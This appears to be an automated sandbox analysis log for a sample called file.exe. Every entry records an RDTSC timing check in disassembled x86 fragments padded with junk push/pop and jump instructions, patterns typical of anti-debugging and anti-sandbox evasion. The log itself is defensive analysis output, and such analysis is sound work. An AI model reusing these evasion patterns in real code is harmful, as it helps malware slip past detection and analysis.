Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D63BE second address: 11D63F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007FEDA531E8D1h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEDA531E8D8h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D56B9 second address: 11D56DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEDA51D0EBEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D5A92 second address: 11D5ADE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FEDA531E8CDh 0x0000000f jmp 00007FEDA531E8CAh 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FEDA531E8D4h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D5ADE second address: 11D5AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D5AE2 second address: 11D5B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b jmp 00007FEDA531E8D7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D5B06 second address: 11D5B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FEDA51D0EB6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D5B13 second address: 11D5B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D5B17 second address: 11D5B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FEDA51D0EC6h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D5B38 second address: 11D5B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEDA531E8D9h 0x0000000e jo 00007FEDA531E8C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DE97B second address: 11DE981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DCA3D second address: 11DCA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnl 00007FEDA531E8C8h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DCA50 second address: 11DCA70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DCD27 second address: 11DCD42 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEDA531E8DDh 0x00000008 jmp 00007FEDA531E8D1h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD054 second address: 11DD059 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD059 second address: 11DD07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FEDA531E8CCh 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FEDA531E8CEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD07D second address: 11DD0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FEDA51D0EC7h 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD0AC second address: 11DD0B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD0B0 second address: 11DD0BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FEDA51D0EBCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD826 second address: 11DD82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DDE22 second address: 11DDE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007FEDA51D0EB6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DDE32 second address: 11DDE36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DE0E9 second address: 11DE0F3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEDA51D0EBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DE6C5 second address: 11DE6CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1B2F second address: 11E1B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1B35 second address: 11E1B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1B3A second address: 11E1B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FEDA51D0EB6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1C89 second address: 11E1C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007FEDA531E8C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1C95 second address: 11E1CA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1CA3 second address: 11E1CA8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1E03 second address: 11E1E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FEDA51D0EB6h 0x0000000a popad 0x0000000b jmp 00007FEDA51D0EC3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1FD1 second address: 11E1FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E2173 second address: 11E2179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E26C6 second address: 11E26CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E26CC second address: 11E26D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E8AAC second address: 11E8AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E8AB2 second address: 11E8ACC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E8ACC second address: 11E8AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007FEDA531E8C6h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FEDA531E8CAh 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E8AEC second address: 11E8AF2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E8AF2 second address: 11E8B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 ja 00007FEDA531E8C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E8B03 second address: 11E8B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FEDA51D0EBAh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007FEDA51D0EB6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EEEE2 second address: 11EEEE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EF4B8 second address: 11EF4EA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FEDA51D0EC6h 0x00000008 jnp 00007FEDA51D0EB6h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jo 00007FEDA51D0ED9h 0x00000017 push eax 0x00000018 push edx 0x00000019 jnp 00007FEDA51D0EB6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EF4EA second address: 11EF4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EF931 second address: 11EF936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EFAC8 second address: 11EFAD2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEDA531E8C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EFAD2 second address: 11EFAD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EFC5B second address: 11EFC68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EFC68 second address: 11EFC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA51D0EC8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F9A6E second address: 11F9A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FEDA531E8DBh 0x0000000a jne 00007FEDA531E8C6h 0x00000010 jmp 00007FEDA531E8CFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F9742 second address: 11F9746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FB07A second address: 11FB07E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FB07E second address: 11FB082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FB082 second address: 11FB088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1206BFD second address: 1206C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1206C01 second address: 1206C23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8D0h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jl 00007FEDA531E8C6h 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1206C23 second address: 1206C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1206C29 second address: 1206C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1206639 second address: 1206645 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1206645 second address: 120665C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FEDA531E8C6h 0x00000009 jnc 00007FEDA531E8C6h 0x0000000f jg 00007FEDA531E8C6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120665C second address: 1206664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12084AC second address: 12084CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jnc 00007FEDA531E8CCh 0x00000011 jns 00007FEDA531E8C6h 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121DD53 second address: 121DD59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121DD59 second address: 121DD5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1225593 second address: 12255B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEDA51D0EC2h 0x00000008 jno 00007FEDA51D0EB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12255B0 second address: 12255B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12255B6 second address: 12255E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FEDA51D0EC0h 0x0000000f jmp 00007FEDA51D0EC2h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12255E1 second address: 12255EB instructions: 0x00000000 rdtsc 0x00000002 je 00007FEDA531E8D8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 112BB09 second address: 112BB25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FEDA51D0EBFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1223D0A second address: 1223D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA531E8D8h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FEDA531E8D5h 0x00000012 jmp 00007FEDA531E8D6h 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f pop eax 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1223D5E second address: 1223D62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1223EDF second address: 1223EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jp 00007FEDA531E8C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1224087 second address: 12240A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC8h 0x00000007 jne 00007FEDA51D0EC2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12240A9 second address: 12240AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1224361 second address: 1224365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1224365 second address: 122437F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FEDA531E8D8h 0x0000000c jmp 00007FEDA531E8CCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1224651 second address: 122465F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jnp 00007FEDA51D0EB6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122465F second address: 1224665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1224665 second address: 122466B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12252DE second address: 12252E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12252E6 second address: 12252FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FEDA51D0EBDh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12252FE second address: 1225302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1226D19 second address: 1226D1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1226D1D second address: 1226D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEDA531E8C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FEDA531E8D9h 0x00000012 jmp 00007FEDA531E8D0h 0x00000017 pop ebx 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d pop eax 0x0000001e push edx 0x0000001f pop edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 push edi 0x00000023 pop edi 0x00000024 popad 0x00000025 pushad 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 jmp 00007FEDA531E8D5h 0x0000002d jmp 00007FEDA531E8CAh 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1226D84 second address: 1226D8B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122A9F7 second address: 122A9FD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122A9FD second address: 122AA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122AA03 second address: 122AA1B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnc 00007FEDA531E8C6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEDA531E8CAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122AA1B second address: 122AA34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEDA51D0EC3h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122AA34 second address: 122AA3A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1239198 second address: 12391A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12391A1 second address: 12391B1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEDA531E8C6h 0x00000008 je 00007FEDA531E8C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12391B1 second address: 12391CA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEDA51D0EB8h 0x00000008 pushad 0x00000009 jmp 00007FEDA51D0EBCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1261C53 second address: 1261C59 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1262386 second address: 12623CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007FEDA51D0EBEh 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FEDA51D0EC9h 0x00000013 jp 00007FEDA51D0EBCh 0x00000019 je 00007FEDA51D0EB6h 0x0000001f jc 00007FEDA51D0ED0h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126269E second address: 12626A3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1262804 second address: 1262821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA51D0EC9h 0x00000009 rdtsc
